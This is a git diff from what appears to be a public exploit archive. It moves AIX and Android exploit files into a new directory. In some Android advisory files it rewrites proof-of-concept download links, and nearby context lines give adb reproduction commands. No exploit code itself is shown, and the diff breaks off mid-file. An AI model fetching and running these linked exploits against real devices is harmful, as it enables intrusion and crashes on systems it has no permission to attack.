diff --git a/platforms/aix/dos/15264.py b/exploits/aix/dos/15264.py similarity index 100% rename from platforms/aix/dos/15264.py rename to exploits/aix/dos/15264.py diff --git a/platforms/aix/dos/16657.rb b/exploits/aix/dos/16657.rb similarity index 100% rename from platforms/aix/dos/16657.rb rename to exploits/aix/dos/16657.rb diff --git a/platforms/aix/dos/16929.rb b/exploits/aix/dos/16929.rb similarity index 100% rename from platforms/aix/dos/16929.rb rename to exploits/aix/dos/16929.rb diff --git a/platforms/aix/dos/19046.txt b/exploits/aix/dos/19046.txt similarity index 100% rename from platforms/aix/dos/19046.txt rename to exploits/aix/dos/19046.txt diff --git a/platforms/aix/dos/19049.txt b/exploits/aix/dos/19049.txt similarity index 100% rename from platforms/aix/dos/19049.txt rename to exploits/aix/dos/19049.txt diff --git a/platforms/aix/dos/22249.txt b/exploits/aix/dos/22249.txt similarity index 100% rename from platforms/aix/dos/22249.txt rename to exploits/aix/dos/22249.txt diff --git a/platforms/aix/dos/25807.txt b/exploits/aix/dos/25807.txt similarity index 100% rename from platforms/aix/dos/25807.txt rename to exploits/aix/dos/25807.txt diff --git a/platforms/aix/dos/33943.txt b/exploits/aix/dos/33943.txt similarity index 100% rename from platforms/aix/dos/33943.txt rename to exploits/aix/dos/33943.txt diff --git a/platforms/aix/dos/34588.txt b/exploits/aix/dos/34588.txt similarity index 100% rename from platforms/aix/dos/34588.txt rename to exploits/aix/dos/34588.txt diff --git a/platforms/aix/dos/35342.txt b/exploits/aix/dos/35342.txt similarity index 100% rename from platforms/aix/dos/35342.txt rename to exploits/aix/dos/35342.txt diff --git a/platforms/aix/local/1001.txt b/exploits/aix/local/1001.txt similarity index 100% rename from platforms/aix/local/1001.txt rename to exploits/aix/local/1001.txt diff --git a/platforms/aix/local/1044.c b/exploits/aix/local/1044.c similarity index 100% rename from platforms/aix/local/1044.c rename to exploits/aix/local/1044.c diff --git a/platforms/aix/local/1045.c b/exploits/aix/local/1045.c similarity index 100% rename from platforms/aix/local/1045.c rename to exploits/aix/local/1045.c diff --git a/platforms/aix/local/1046.c b/exploits/aix/local/1046.c similarity index 100% rename from platforms/aix/local/1046.c rename to exploits/aix/local/1046.c diff --git a/platforms/aix/local/16659.rb b/exploits/aix/local/16659.rb similarity index 100% rename from platforms/aix/local/16659.rb rename to exploits/aix/local/16659.rb diff --git a/platforms/aix/local/19041.txt b/exploits/aix/local/19041.txt similarity index 100% rename from platforms/aix/local/19041.txt rename to exploits/aix/local/19041.txt diff --git a/platforms/aix/local/19043.txt b/exploits/aix/local/19043.txt similarity index 100% rename from platforms/aix/local/19043.txt rename to exploits/aix/local/19043.txt diff --git a/platforms/aix/local/19045.txt b/exploits/aix/local/19045.txt similarity index 100% rename from platforms/aix/local/19045.txt rename to exploits/aix/local/19045.txt diff --git a/platforms/aix/local/19213.sh b/exploits/aix/local/19213.sh similarity index 100% rename from platforms/aix/local/19213.sh rename to exploits/aix/local/19213.sh diff --git a/platforms/aix/local/19214.c b/exploits/aix/local/19214.c similarity index 100% rename from platforms/aix/local/19214.c rename to exploits/aix/local/19214.c diff --git a/platforms/aix/local/19215.c b/exploits/aix/local/19215.c similarity index 100% rename from platforms/aix/local/19215.c rename to exploits/aix/local/19215.c diff --git a/platforms/aix/local/19216.c b/exploits/aix/local/19216.c similarity index 100% rename from platforms/aix/local/19216.c rename to exploits/aix/local/19216.c diff --git a/platforms/aix/local/19217.c b/exploits/aix/local/19217.c similarity index 100% rename from platforms/aix/local/19217.c rename to exploits/aix/local/19217.c diff --git a/platforms/aix/local/19229.txt b/exploits/aix/local/19229.txt similarity index 100% rename from platforms/aix/local/19229.txt rename to exploits/aix/local/19229.txt diff --git a/platforms/aix/local/19287.c b/exploits/aix/local/19287.c similarity index 100% rename from platforms/aix/local/19287.c rename to exploits/aix/local/19287.c diff --git a/platforms/aix/local/19300.txt b/exploits/aix/local/19300.txt similarity index 100% rename from platforms/aix/local/19300.txt rename to exploits/aix/local/19300.txt diff --git a/platforms/aix/local/19306.c b/exploits/aix/local/19306.c similarity index 100% rename from platforms/aix/local/19306.c rename to exploits/aix/local/19306.c diff --git a/platforms/aix/local/19307.c b/exploits/aix/local/19307.c similarity index 100% rename from platforms/aix/local/19307.c rename to exploits/aix/local/19307.c diff --git a/platforms/aix/local/19309.c b/exploits/aix/local/19309.c similarity index 100% rename from platforms/aix/local/19309.c rename to exploits/aix/local/19309.c diff --git a/platforms/aix/local/19318.c b/exploits/aix/local/19318.c similarity index 100% rename from platforms/aix/local/19318.c rename to exploits/aix/local/19318.c diff --git a/platforms/aix/local/19344.sh b/exploits/aix/local/19344.sh similarity index 100% rename from platforms/aix/local/19344.sh rename to exploits/aix/local/19344.sh diff --git a/platforms/aix/local/19345.txt b/exploits/aix/local/19345.txt similarity index 100% rename from platforms/aix/local/19345.txt rename to exploits/aix/local/19345.txt diff --git a/platforms/aix/local/19354.txt b/exploits/aix/local/19354.txt similarity index 100% rename from platforms/aix/local/19354.txt rename to exploits/aix/local/19354.txt diff --git a/platforms/aix/local/19418.txt b/exploits/aix/local/19418.txt similarity index 100% rename from platforms/aix/local/19418.txt rename to exploits/aix/local/19418.txt diff --git a/platforms/aix/local/20213.txt b/exploits/aix/local/20213.txt similarity index 100% rename from platforms/aix/local/20213.txt rename to exploits/aix/local/20213.txt diff --git a/platforms/aix/local/20290.txt b/exploits/aix/local/20290.txt similarity index 100% rename from platforms/aix/local/20290.txt rename to exploits/aix/local/20290.txt diff --git a/platforms/aix/local/20452.c b/exploits/aix/local/20452.c similarity index 100% rename from platforms/aix/local/20452.c rename to exploits/aix/local/20452.c diff --git a/platforms/aix/local/20453.c b/exploits/aix/local/20453.c similarity index 100% rename from platforms/aix/local/20453.c rename to exploits/aix/local/20453.c diff --git a/platforms/aix/local/20454.sh b/exploits/aix/local/20454.sh similarity index 100% rename from platforms/aix/local/20454.sh rename to exploits/aix/local/20454.sh diff --git a/platforms/aix/local/20455.c b/exploits/aix/local/20455.c similarity index 100% rename from platforms/aix/local/20455.c rename to exploits/aix/local/20455.c diff --git a/platforms/aix/local/20965.sh b/exploits/aix/local/20965.sh similarity index 100% rename from platforms/aix/local/20965.sh rename to exploits/aix/local/20965.sh diff --git a/platforms/aix/local/21094.c b/exploits/aix/local/21094.c similarity index 100% rename from platforms/aix/local/21094.c rename to exploits/aix/local/21094.c diff --git a/platforms/aix/local/21904.pl b/exploits/aix/local/21904.pl similarity index 100% rename from platforms/aix/local/21904.pl rename to exploits/aix/local/21904.pl diff --git a/platforms/aix/local/22756.pl b/exploits/aix/local/22756.pl similarity index 100% rename from platforms/aix/local/22756.pl rename to exploits/aix/local/22756.pl diff --git a/platforms/aix/local/23838.pl b/exploits/aix/local/23838.pl similarity index 100% rename from platforms/aix/local/23838.pl rename to exploits/aix/local/23838.pl diff --git a/platforms/aix/local/23840.pl b/exploits/aix/local/23840.pl similarity index 100% rename from platforms/aix/local/23840.pl rename to exploits/aix/local/23840.pl diff --git a/platforms/aix/local/23841.c b/exploits/aix/local/23841.c similarity index 100% rename from platforms/aix/local/23841.c rename to exploits/aix/local/23841.c diff --git a/platforms/aix/local/23883.pl b/exploits/aix/local/23883.pl similarity index 100% rename from platforms/aix/local/23883.pl rename to exploits/aix/local/23883.pl diff --git a/platforms/aix/local/25039.txt b/exploits/aix/local/25039.txt similarity index 100% rename from platforms/aix/local/25039.txt rename to exploits/aix/local/25039.txt diff --git a/platforms/aix/local/26996.txt b/exploits/aix/local/26996.txt similarity index 100% rename from platforms/aix/local/26996.txt rename to exploits/aix/local/26996.txt diff --git a/platforms/aix/local/26997.txt b/exploits/aix/local/26997.txt similarity index 100% rename from platforms/aix/local/26997.txt rename to exploits/aix/local/26997.txt diff --git a/platforms/aix/local/28507.sh b/exploits/aix/local/28507.sh similarity index 100% rename from platforms/aix/local/28507.sh rename to exploits/aix/local/28507.sh diff --git a/platforms/aix/local/30399.c b/exploits/aix/local/30399.c similarity index 100% rename from platforms/aix/local/30399.c rename to exploits/aix/local/30399.c diff --git a/platforms/aix/local/333.c b/exploits/aix/local/333.c similarity index 100% rename from platforms/aix/local/333.c rename to exploits/aix/local/333.c diff --git a/platforms/aix/local/335.c b/exploits/aix/local/335.c similarity index 100% rename from platforms/aix/local/335.c rename to exploits/aix/local/335.c diff --git a/platforms/aix/local/33725.txt b/exploits/aix/local/33725.txt similarity index 100% rename from platforms/aix/local/33725.txt rename to exploits/aix/local/33725.txt diff --git a/platforms/aix/local/38106.txt b/exploits/aix/local/38106.txt similarity index 100% rename from platforms/aix/local/38106.txt rename to exploits/aix/local/38106.txt diff --git a/platforms/aix/local/38576.sh b/exploits/aix/local/38576.sh similarity index 100% rename from platforms/aix/local/38576.sh rename to exploits/aix/local/38576.sh diff --git a/platforms/aix/local/40709.sh b/exploits/aix/local/40709.sh similarity index 100% rename from platforms/aix/local/40709.sh rename to exploits/aix/local/40709.sh diff --git a/platforms/aix/local/40710.sh b/exploits/aix/local/40710.sh similarity index 100% rename from platforms/aix/local/40710.sh rename to exploits/aix/local/40710.sh diff --git a/platforms/aix/local/40950.sh b/exploits/aix/local/40950.sh similarity index 100% rename from platforms/aix/local/40950.sh rename to exploits/aix/local/40950.sh diff --git a/platforms/aix/local/4231.c b/exploits/aix/local/4231.c similarity index 100% rename from platforms/aix/local/4231.c rename to exploits/aix/local/4231.c diff --git a/platforms/aix/local/4232.sh b/exploits/aix/local/4232.sh similarity index 100% rename from platforms/aix/local/4232.sh rename to exploits/aix/local/4232.sh diff --git a/platforms/aix/local/4233.c b/exploits/aix/local/4233.c similarity index 100% rename from platforms/aix/local/4233.c rename to exploits/aix/local/4233.c diff --git a/platforms/aix/local/4612.py b/exploits/aix/local/4612.py similarity index 100% rename from platforms/aix/local/4612.py rename to exploits/aix/local/4612.py diff --git a/platforms/aix/local/699.c b/exploits/aix/local/699.c similarity index 100% rename from platforms/aix/local/699.c rename to exploits/aix/local/699.c diff --git a/platforms/aix/local/701.sh b/exploits/aix/local/701.sh similarity index 100% rename from platforms/aix/local/701.sh rename to exploits/aix/local/701.sh diff --git a/platforms/aix/local/898.sh b/exploits/aix/local/898.sh similarity index 100% rename from platforms/aix/local/898.sh rename to exploits/aix/local/898.sh diff --git a/platforms/aix/local/9306.txt b/exploits/aix/local/9306.txt similarity index 100% rename from platforms/aix/local/9306.txt rename to exploits/aix/local/9306.txt diff --git a/platforms/aix/local/9645.sh b/exploits/aix/local/9645.sh similarity index 100% rename from platforms/aix/local/9645.sh rename to exploits/aix/local/9645.sh diff --git a/platforms/aix/remote/14407.c b/exploits/aix/remote/14407.c similarity index 100% rename from platforms/aix/remote/14407.c rename to exploits/aix/remote/14407.c diff --git a/platforms/aix/remote/14409.pl b/exploits/aix/remote/14409.pl similarity index 100% rename from platforms/aix/remote/14409.pl rename to exploits/aix/remote/14409.pl diff --git a/platforms/aix/remote/14456.c b/exploits/aix/remote/14456.c similarity index 100% rename from platforms/aix/remote/14456.c rename to exploits/aix/remote/14456.c diff --git a/platforms/aix/remote/16930.rb b/exploits/aix/remote/16930.rb similarity index 100% rename from platforms/aix/remote/16930.rb rename to exploits/aix/remote/16930.rb diff --git a/platforms/aix/remote/19047.txt b/exploits/aix/remote/19047.txt similarity index 100% rename from platforms/aix/remote/19047.txt rename to exploits/aix/remote/19047.txt diff --git a/platforms/aix/remote/19048.txt b/exploits/aix/remote/19048.txt similarity index 100% rename from platforms/aix/remote/19048.txt rename to exploits/aix/remote/19048.txt diff --git a/platforms/aix/remote/19237.txt b/exploits/aix/remote/19237.txt similarity index 100% rename from platforms/aix/remote/19237.txt rename to exploits/aix/remote/19237.txt diff --git a/platforms/aix/remote/19348.txt b/exploits/aix/remote/19348.txt similarity index 100% rename from platforms/aix/remote/19348.txt rename to exploits/aix/remote/19348.txt diff --git a/platforms/aix/remote/19532.pl b/exploits/aix/remote/19532.pl similarity index 100% rename from platforms/aix/remote/19532.pl rename to exploits/aix/remote/19532.pl diff --git a/platforms/aix/remote/21093.c b/exploits/aix/remote/21093.c similarity index 100% rename from platforms/aix/remote/21093.c rename to exploits/aix/remote/21093.c diff --git a/platforms/aix/webapps/10372.txt b/exploits/aix/webapps/10372.txt similarity index 100% rename from platforms/aix/webapps/10372.txt rename to exploits/aix/webapps/10372.txt diff --git a/platforms/aix/webapps/11580.txt b/exploits/aix/webapps/11580.txt similarity index 100% rename from platforms/aix/webapps/11580.txt rename to exploits/aix/webapps/11580.txt diff --git a/platforms/aix/webapps/14058.html b/exploits/aix/webapps/14058.html similarity index 100% rename from platforms/aix/webapps/14058.html rename to exploits/aix/webapps/14058.html diff --git a/platforms/aix/webapps/21319.txt b/exploits/aix/webapps/21319.txt similarity index 100% rename from platforms/aix/webapps/21319.txt rename to exploits/aix/webapps/21319.txt diff --git a/platforms/aix/webapps/33736.php b/exploits/aix/webapps/33736.php similarity index 100% rename from platforms/aix/webapps/33736.php rename to exploits/aix/webapps/33736.php diff --git a/platforms/aix/webapps/41546.txt b/exploits/aix/webapps/41546.txt similarity index 100% rename from platforms/aix/webapps/41546.txt rename to exploits/aix/webapps/41546.txt diff --git a/platforms/android/dos/18630.txt b/exploits/android/dos/18630.txt similarity index 100% rename from platforms/android/dos/18630.txt rename to exploits/android/dos/18630.txt diff --git a/platforms/android/dos/23248.txt b/exploits/android/dos/23248.txt similarity index 100% rename from platforms/android/dos/23248.txt rename to exploits/android/dos/23248.txt diff --git a/platforms/android/dos/28957.txt b/exploits/android/dos/28957.txt similarity index 100% rename from platforms/android/dos/28957.txt rename to exploits/android/dos/28957.txt diff --git a/platforms/android/dos/31307.py b/exploits/android/dos/31307.py similarity index 100% rename from platforms/android/dos/31307.py rename to exploits/android/dos/31307.py diff --git a/platforms/android/dos/31308.html b/exploits/android/dos/31308.html similarity index 100% rename from platforms/android/dos/31308.html rename to exploits/android/dos/31308.html diff --git a/platforms/android/dos/35382.txt b/exploits/android/dos/35382.txt similarity index 100% rename from platforms/android/dos/35382.txt rename to exploits/android/dos/35382.txt diff --git a/platforms/android/dos/35637.py b/exploits/android/dos/35637.py similarity index 100% rename from platforms/android/dos/35637.py rename to exploits/android/dos/35637.py diff --git a/platforms/android/dos/35913.txt b/exploits/android/dos/35913.txt similarity index 100% rename from platforms/android/dos/35913.txt rename to exploits/android/dos/35913.txt diff --git a/platforms/android/dos/38555.txt b/exploits/android/dos/38555.txt similarity index 96% rename from platforms/android/dos/38555.txt rename to exploits/android/dos/38555.txt index e9da49496..de2818e3c 100644 --- a/platforms/android/dos/38555.txt +++ b/exploits/android/dos/38555.txt @@ -35,4 +35,4 @@ In this code snippet, the data.buf_out.num_planes value is attacker-controlled " Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38555.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38555.zip \ No newline at end of file diff --git a/platforms/android/dos/38556.txt b/exploits/android/dos/38556.txt similarity index 100% rename from platforms/android/dos/38556.txt rename to exploits/android/dos/38556.txt diff --git a/platforms/android/dos/38557.txt b/exploits/android/dos/38557.txt similarity index 96% rename from platforms/android/dos/38557.txt rename to exploits/android/dos/38557.txt index d51439a71..d818588a5 100644 --- a/platforms/android/dos/38557.txt +++ b/exploits/android/dos/38557.txt @@ -56,4 +56,4 @@ One ioctl should have valid data, the other should fail At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38557.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38557.zip \ No newline at end of file diff --git a/platforms/android/dos/38558.txt b/exploits/android/dos/38558.txt similarity index 100% rename from platforms/android/dos/38558.txt rename to exploits/android/dos/38558.txt diff --git a/platforms/android/dos/38610.txt b/exploits/android/dos/38610.txt similarity index 97% rename from platforms/android/dos/38610.txt rename to exploits/android/dos/38610.txt index 6c9e9672f..03c703a84 100644 --- a/platforms/android/dos/38610.txt +++ b/exploits/android/dos/38610.txt @@ -26,4 +26,4 @@ I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/ To reproduce, download the file and open it in Gallery Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38610.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38610.zip \ No newline at end of file diff --git a/platforms/android/dos/38611.txt b/exploits/android/dos/38611.txt similarity index 97% rename from platforms/android/dos/38611.txt rename to exploits/android/dos/38611.txt index be892a403..154dd6afe 100644 --- a/platforms/android/dos/38611.txt +++ b/exploits/android/dos/38611.txt @@ -31,4 +31,4 @@ To reproduce, download the attached file and wait, or trigger media scanning by adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38611.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38611.zip \ No newline at end of file diff --git a/platforms/android/dos/38612.txt b/exploits/android/dos/38612.txt similarity index 97% rename from platforms/android/dos/38612.txt rename to exploits/android/dos/38612.txt index 3ecf7006f..2c09c5f2a 100644 --- a/platforms/android/dos/38612.txt +++ b/exploits/android/dos/38612.txt @@ -37,4 +37,4 @@ To reproduce, download the image file and wait, or trigger media scanning by cal adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38612.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38612.zip \ No newline at end of file diff --git a/platforms/android/dos/38613.txt b/exploits/android/dos/38613.txt similarity index 97% rename from platforms/android/dos/38613.txt rename to exploits/android/dos/38613.txt index 98aba65dd..f0c295f97 100644 --- a/platforms/android/dos/38613.txt +++ b/exploits/android/dos/38613.txt @@ -28,4 +28,4 @@ To reproduce, download the file and open it in Gallery. This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38613.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38613.zip \ No newline at end of file diff --git a/platforms/android/dos/38614.txt b/exploits/android/dos/38614.txt similarity index 97% rename from platforms/android/dos/38614.txt rename to exploits/android/dos/38614.txt index 63da48ecd..7e4677e46 100644 --- a/platforms/android/dos/38614.txt +++ b/exploits/android/dos/38614.txt @@ -55,4 +55,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38614.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38614.zip \ No newline at end of file diff --git a/platforms/android/dos/39424.txt b/exploits/android/dos/39424.txt similarity index 97% rename from platforms/android/dos/39424.txt rename to exploits/android/dos/39424.txt index eea9d07e1..3eb9b593f 100644 --- a/platforms/android/dos/39424.txt +++ b/exploits/android/dos/39424.txt @@ -37,4 +37,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39424.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39424.zip \ No newline at end of file diff --git a/platforms/android/dos/39425.txt b/exploits/android/dos/39425.txt similarity index 97% rename from platforms/android/dos/39425.txt rename to exploits/android/dos/39425.txt index 915c7effc..6c1a9d462 100644 --- a/platforms/android/dos/39425.txt +++ b/exploits/android/dos/39425.txt @@ -29,4 +29,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39425.zip \ No newline at end of file diff --git a/platforms/android/dos/39504.c b/exploits/android/dos/39504.c similarity index 100% rename from platforms/android/dos/39504.c rename to exploits/android/dos/39504.c diff --git a/platforms/android/dos/39629.txt b/exploits/android/dos/39629.txt similarity index 98% rename from platforms/android/dos/39629.txt rename to exploits/android/dos/39629.txt index 87c9917fc..84c85d193 100644 --- a/platforms/android/dos/39629.txt +++ b/exploits/android/dos/39629.txt @@ -159,4 +159,4 @@ prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqD Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39629.zip \ No newline at end of file diff --git a/platforms/android/dos/39651.txt b/exploits/android/dos/39651.txt similarity index 97% rename from platforms/android/dos/39651.txt rename to exploits/android/dos/39651.txt index 4eb7f6d2c..208da0360 100644 --- a/platforms/android/dos/39651.txt +++ b/exploits/android/dos/39651.txt @@ -55,4 +55,4 @@ Reported to Android here: https://code.google.com/p/android/issues/detail?id=185 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39651.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39651.zip \ No newline at end of file diff --git a/platforms/android/dos/39685.txt b/exploits/android/dos/39685.txt similarity index 97% rename from platforms/android/dos/39685.txt rename to exploits/android/dos/39685.txt index 6c064b15f..a0a3b457b 100644 --- a/platforms/android/dos/39685.txt +++ b/exploits/android/dos/39685.txt @@ -42,4 +42,4 @@ Where XXXXXX should be uninitialized memory from the heap. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39685.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39685.zip \ No newline at end of file diff --git a/platforms/android/dos/39686.txt b/exploits/android/dos/39686.txt similarity index 97% rename from platforms/android/dos/39686.txt rename to exploits/android/dos/39686.txt index 1aa6a6c0c..996239c91 100644 --- a/platforms/android/dos/39686.txt +++ b/exploits/android/dos/39686.txt @@ -86,4 +86,4 @@ I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39686.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39686.zip \ No newline at end of file diff --git a/platforms/android/dos/39801.c b/exploits/android/dos/39801.c similarity index 100% rename from platforms/android/dos/39801.c rename to exploits/android/dos/39801.c diff --git a/platforms/android/dos/39921.txt b/exploits/android/dos/39921.txt similarity index 96% rename from platforms/android/dos/39921.txt rename to exploits/android/dos/39921.txt index fcde6cfe9..6f5d531ab 100644 --- a/platforms/android/dos/39921.txt +++ b/exploits/android/dos/39921.txt @@ -92,4 +92,4 @@ cpsr 0x80070030 -2147024848 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39921.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39921.zip \ No newline at end of file diff --git a/platforms/android/dos/40381.txt b/exploits/android/dos/40381.txt similarity index 98% rename from platforms/android/dos/40381.txt rename to exploits/android/dos/40381.txt index d3211260d..bfa92ca63 100644 --- a/platforms/android/dos/40381.txt +++ b/exploits/android/dos/40381.txt @@ -140,4 +140,4 @@ If there is e.g. some system_app that performs permissions checks (which use the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40381.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40381.zip \ No newline at end of file diff --git a/platforms/android/dos/40449.txt b/exploits/android/dos/40449.txt similarity index 97% rename from platforms/android/dos/40449.txt rename to exploits/android/dos/40449.txt index 9ea6a7517..0bd49501d 100644 --- a/platforms/android/dos/40449.txt +++ b/exploits/android/dos/40449.txt @@ -36,4 +36,4 @@ Its logcat output looks like this: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40449.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40449.zip \ No newline at end of file diff --git a/platforms/android/dos/40502.txt b/exploits/android/dos/40502.txt similarity index 100% rename from platforms/android/dos/40502.txt rename to exploits/android/dos/40502.txt diff --git a/platforms/android/dos/40515.txt b/exploits/android/dos/40515.txt similarity index 97% rename from platforms/android/dos/40515.txt rename to exploits/android/dos/40515.txt index 36977ca43..a46b4a3fb 100644 --- a/platforms/android/dos/40515.txt +++ b/exploits/android/dos/40515.txt @@ -142,4 +142,4 @@ a uint32_t is smaller than a binder_uintptr_t. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40515.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40515.zip \ No newline at end of file diff --git a/platforms/android/dos/40876.txt b/exploits/android/dos/40876.txt similarity index 97% rename from platforms/android/dos/40876.txt rename to exploits/android/dos/40876.txt index c993fbee1..63008115b 100644 --- a/platforms/android/dos/40876.txt +++ b/exploits/android/dos/40876.txt @@ -165,4 +165,4 @@ Fixed in the November security bulletin at https://source.android.com/security/b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40876.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40876.zip \ No newline at end of file diff --git a/platforms/android/dos/40913.java b/exploits/android/dos/40913.java similarity index 100% rename from platforms/android/dos/40913.java rename to exploits/android/dos/40913.java diff --git a/platforms/android/dos/40914.java b/exploits/android/dos/40914.java similarity index 100% rename from platforms/android/dos/40914.java rename to exploits/android/dos/40914.java diff --git a/platforms/android/dos/40945.txt b/exploits/android/dos/40945.txt similarity index 97% rename from platforms/android/dos/40945.txt rename to exploits/android/dos/40945.txt index c6e4ce42b..dcbb39d1d 100644 --- a/platforms/android/dos/40945.txt +++ b/exploits/android/dos/40945.txt @@ -135,4 +135,4 @@ Fixed in https://source.android.com/security/bulletin/2016-12-01.html Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40945.zip \ No newline at end of file diff --git a/platforms/android/dos/40993.txt b/exploits/android/dos/40993.txt similarity index 97% rename from platforms/android/dos/40993.txt rename to exploits/android/dos/40993.txt index 56ea24458..e8bae8590 100644 --- a/platforms/android/dos/40993.txt +++ b/exploits/android/dos/40993.txt @@ -58,4 +58,4 @@ According to the default SELinux rules as present on the SM-G935F (version XXS1A Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40993.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40993.zip \ No newline at end of file diff --git a/platforms/android/dos/41161.txt b/exploits/android/dos/41161.txt similarity index 97% rename from platforms/android/dos/41161.txt rename to exploits/android/dos/41161.txt index b847ed80a..e8479316c 100644 --- a/platforms/android/dos/41161.txt +++ b/exploits/android/dos/41161.txt @@ -67,4 +67,4 @@ The sysfs entries mentioned above are world-readable and have an SELinux context Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41161.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41161.zip \ No newline at end of file diff --git a/platforms/android/dos/41211.txt b/exploits/android/dos/41211.txt similarity index 97% rename from platforms/android/dos/41211.txt rename to exploits/android/dos/41211.txt index 51dec7203..0dc40cd5e 100644 --- a/platforms/android/dos/41211.txt +++ b/exploits/android/dos/41211.txt @@ -30,4 +30,4 @@ This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel V Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41211.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41211.zip \ No newline at end of file diff --git a/platforms/android/dos/41212.txt b/exploits/android/dos/41212.txt similarity index 98% rename from platforms/android/dos/41212.txt rename to exploits/android/dos/41212.txt index f8551cb0e..c9b727186 100644 --- a/platforms/android/dos/41212.txt +++ b/exploits/android/dos/41212.txt @@ -38,4 +38,4 @@ This PoC disables the M bit in SCTLR_EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41212.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41212.zip \ No newline at end of file diff --git a/platforms/android/dos/41218.txt b/exploits/android/dos/41218.txt similarity index 97% rename from platforms/android/dos/41218.txt rename to exploits/android/dos/41218.txt index 2a1ab444f..ea1c86b0e 100644 --- a/platforms/android/dos/41218.txt +++ b/exploits/android/dos/41218.txt @@ -44,4 +44,4 @@ This PoC s2-remaps RKP's physical address range and reads from it in EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41218.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41218.zip \ No newline at end of file diff --git a/platforms/android/dos/41232.txt b/exploits/android/dos/41232.txt similarity index 97% rename from platforms/android/dos/41232.txt rename to exploits/android/dos/41232.txt index 869d0d4b6..373f854f6 100644 --- a/platforms/android/dos/41232.txt +++ 